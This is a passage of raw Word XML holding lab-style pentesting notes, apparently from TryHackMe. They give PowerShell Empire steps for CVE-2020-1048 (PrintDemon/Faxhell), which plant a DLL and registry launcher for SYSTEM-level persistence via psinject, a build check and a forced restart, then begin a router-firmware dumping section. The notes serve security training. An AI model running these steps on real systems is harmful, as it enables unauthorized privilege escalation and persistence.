        <w:t>psinject &lt;listener name&gt; &lt;processid&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6CBB27" w14:textId="33027D70" w:rsidR="00520F9B" w:rsidRDefault="00520F9B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>System Check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0192FE32" w14:textId="333B95EE" w:rsidR="00520F9B" w:rsidRDefault="0042554B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>following foothold establishment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF38888" w14:textId="500B00D6" w:rsidR="0042554B" w:rsidRDefault="0042554B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use CVE-2020-1048 – unpatched systems prior to Windows build 2004 are vulnerable to to arbitrary write anywhere vulnerability and DLL hijack through printer abuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512BFD43" w14:textId="6D22741A" w:rsidR="0042554B" w:rsidRDefault="0042554B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>check build number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCCEFDF" w14:textId="6685E27D" w:rsidR="0042554B" w:rsidRDefault="0042554B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0042554B">
        <w:t>Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion" -Name ReleaseId</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394EBB3D" w14:textId="1DA4C985" w:rsidR="0042554B" w:rsidRDefault="0042554B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ReleaseId # &lt; 2004 </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OK to Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D3C091" w14:textId="2D6B6803" w:rsidR="0042554B" w:rsidRDefault="0042554B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Invoke-PrintDemon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C820FD6" w14:textId="4A2E7A5A" w:rsidR="0042554B" w:rsidRDefault="0042554B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>PowerShell Empire implementation PoC using PrintDemon and Faxhell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74189EB7" w14:textId="58B1ED29" w:rsidR="0042554B" w:rsidRDefault="0042554B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Faxhell DLL embedded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE42EF6" w14:textId="0BEDEE16" w:rsidR="0042554B" w:rsidRDefault="0042554B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>prints DLL named ualapi.dll, loaded into SYSTEM32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D3825B" w14:textId="6E46346D" w:rsidR="0042554B" w:rsidRDefault="0042554B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>module places launcher in registry, executing code on SYSTEM restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165635FB" w14:textId="6FF4E195" w:rsidR="0042554B" w:rsidRDefault="00C7140F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>In Empire</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207EF649" w14:textId="4603569E" w:rsidR="00C7140F" w:rsidRDefault="00C7140F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>usemodule privesc/printdemon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091EBDC0" w14:textId="49822464" w:rsidR="00C7140F" w:rsidRDefault="00C7140F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>set LauncherCode &lt;Base64 Encoded Launcher&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BAF004" w14:textId="00F4884C" w:rsidR="00C7140F" w:rsidRDefault="00C7140F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>this is the code from the Launcher output earlier in the process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401D7CFD" w14:textId="2AF7A183" w:rsidR="00C7140F" w:rsidRDefault="00C7140F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>In Starkiller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FBE47F" w14:textId="659F8A1F" w:rsidR="00C7140F" w:rsidRDefault="00C7140F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3482B82E" w14:textId="3EB31813" w:rsidR="00C7140F" w:rsidRDefault="00C7140F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>powershell/privesc/printdemon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AF53E3" w14:textId="33B62B8E" w:rsidR="00C7140F" w:rsidRDefault="00C7140F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>LauncherCode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB1C298" w14:textId="031E4EFD" w:rsidR="00C7140F" w:rsidRDefault="00C7140F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>copy paste Base64 portion of launcher from earlier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC8EB4B" w14:textId="1EE681E3" w:rsidR="00C7140F" w:rsidRDefault="00C7140F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1196BE" w14:textId="20096CE6" w:rsidR="00B93C6D" w:rsidRDefault="00B93C6D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Should receive confirmation of new print job and awaiting restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A38681" w14:textId="33732BB3" w:rsidR="00B93C6D" w:rsidRDefault="00B93C6D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>hit enter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646038C2" w14:textId="76B2E28D" w:rsidR="00B93C6D" w:rsidRDefault="00B93C6D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>type back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AA2C24" w14:textId="6A5B4CE1" w:rsidR="00B93C6D" w:rsidRDefault="00B93C6D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>shell restart-computer -force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA13140" w14:textId="101FB5C5" w:rsidR="00B93C6D" w:rsidRDefault="00B93C6D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>hit enter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8CEDE8" w14:textId="363EA7C4" w:rsidR="00B93C6D" w:rsidRDefault="00B93C6D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>agents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB6E219" w14:textId="11F3F96F" w:rsidR="00B93C6D" w:rsidRDefault="00B93C6D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>wait for restart and hanging text, as mentioned below</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B4DDD5" w14:textId="28823343" w:rsidR="00B93C6D" w:rsidRDefault="00B93C6D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>hit enter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F558F9" w14:textId="684405DD" w:rsidR="00B93C6D" w:rsidRDefault="00B93C6D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="8"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>agents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A1DB7C" w14:textId="247949DD" w:rsidR="00B93C6D" w:rsidRDefault="00B93C6D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="8"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>look for *WORKGROUP\SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C136AFD" w14:textId="0585FF47" w:rsidR="00734702" w:rsidRDefault="00734702" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>interact &lt;SYSTEM agent&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009EEE36" w14:textId="43CF392A" w:rsidR="00734702" w:rsidRDefault="003D2896" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use allowed commands to navigate through system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC5090F" w14:textId="675AA939" w:rsidR="005B74C2" w:rsidRDefault="005B74C2" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Disclaimer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1AE7BF" w14:textId="3EABEBF4" w:rsidR="005B74C2" w:rsidRDefault="005B74C2" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>When using Empire CLI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6487C4FB" w14:textId="1C778072" w:rsidR="005B74C2" w:rsidRDefault="00B93C6D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>whenever a command leaves a hanging statement, such as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F875EEC" w14:textId="0A8D8CAE" w:rsidR="00B93C6D" w:rsidRDefault="00B93C6D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Sending Agent (stage 2) to &lt;agent ID&gt; at &lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735A9C8A" w14:textId="79A1C71F" w:rsidR="00B93C6D" w:rsidRDefault="00B93C6D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>hit enter and then type agents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E60D81D" w14:textId="0499B854" w:rsidR="00B93C6D" w:rsidRDefault="00B93C6D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>find proper agent name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18411C73" w14:textId="73F9C987" w:rsidR="00B93C6D" w:rsidRDefault="00B93C6D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>enter interct &lt;agent name&gt;, to continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B52CFD" w14:textId="7FD0C99C" w:rsidR="00B93C6D" w:rsidRDefault="00B93C6D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>this also occurs when using psinject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D35F36" w14:textId="0D6D9F0B" w:rsidR="003D2896" w:rsidRDefault="003D2896" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417B296F" w14:textId="26852B2A" w:rsidR="003D2896" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId162" w:history="1">
        <w:r w:rsidR="003D2896" w:rsidRPr="00071579">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.bc-security.org/post/reflective-pe-injection-in-windows-10-1909/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="659763D6" w14:textId="1E443315" w:rsidR="003D2896" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId163" w:history="1">
        <w:r w:rsidR="003D2896" w:rsidRPr="00071579">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.bc-security.org/post/i-think-you-have-the-wrong-number-using-errant-callbacks-to-enumerate-and-evade-outlook-s-sandbox/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6BE1A107" w14:textId="087C633E" w:rsidR="003D2896" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId164" w:history="1">
        <w:r w:rsidR="003D2896" w:rsidRPr="00071579">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://tryhackme.com/room/rppsempire</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="227BE484" w14:textId="0EB6C2E3" w:rsidR="003D2896" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId165" w:history="1">
        <w:r w:rsidR="003D2896" w:rsidRPr="00071579">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://tryhackme.com/room/zer0logon</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="146DFE96" w14:textId="775CEFAA" w:rsidR="003D2896" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId166" w:history="1">
        <w:r w:rsidR="003D2896" w:rsidRPr="00071579">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://tryhackme.com/room/blue</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4EA6CD3D" w14:textId="2FC78D6E" w:rsidR="003D2896" w:rsidRDefault="003D2896" w:rsidP="003D2896">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A75E5D1" w14:textId="1C7C7002" w:rsidR="003D2896" w:rsidRDefault="00EB4A14" w:rsidP="003D2896">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Dumping Router Firmware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE1AB54" w14:textId="57678579" w:rsidR="00EB4A14" w:rsidRDefault="00EB4A14" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Preparation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B914C7B" w14:textId="0D2D4A33" w:rsidR="00EB4A14" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId167" w:history="1">
        <w:r w:rsidR="00EB4A14" w:rsidRPr="005A459B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/Sq00ky/Dumping-Router-Firmware-Image/tree/master</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="371F2F03" w14:textId="35A346DC" w:rsidR="00EB4A14" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId168" w:history="1">
        <w:r w:rsidR="00EB4A14" w:rsidRPr="005A459B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/ReFirmLabs/binwalk/blob/master/INSTALL.md</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7640A24E" w14:textId="73A713BD" w:rsidR="00EB4A14" w:rsidRDefault="000E5137" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Investigating Firmware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAD28ED" w14:textId="00AE8E41" w:rsidR="00C52671" w:rsidRDefault="00C52671" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">strings &lt;file&gt;.img | head </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> outputs first ten lines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4393F40F" w14:textId="66B4F8CC" w:rsidR="00C52671" w:rsidRDefault="00C52671" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>strings &lt;file&gt;.img &gt; output.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B9A464" w14:textId="7F5D2349" w:rsidR="00C52671" w:rsidRDefault="00C52671" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ctrl + f </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> search for useful info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331F9810" w14:textId="3EB6E5E5" w:rsidR="00C52671" w:rsidRDefault="00C52671" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>.lua files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099E51B2" w14:textId="5B04A745" w:rsidR="00C52671" w:rsidRDefault="00C52671" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>bin files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C91E2B9" w14:textId="68E961CA" w:rsidR="00C52671" w:rsidRDefault="00C52671" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Dump filesystem from image file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5970D3" w14:textId="0AA9B6AE" w:rsidR="00C52671" w:rsidRDefault="00C52671" w:rsidP="007F0512">
      <w:pPr>
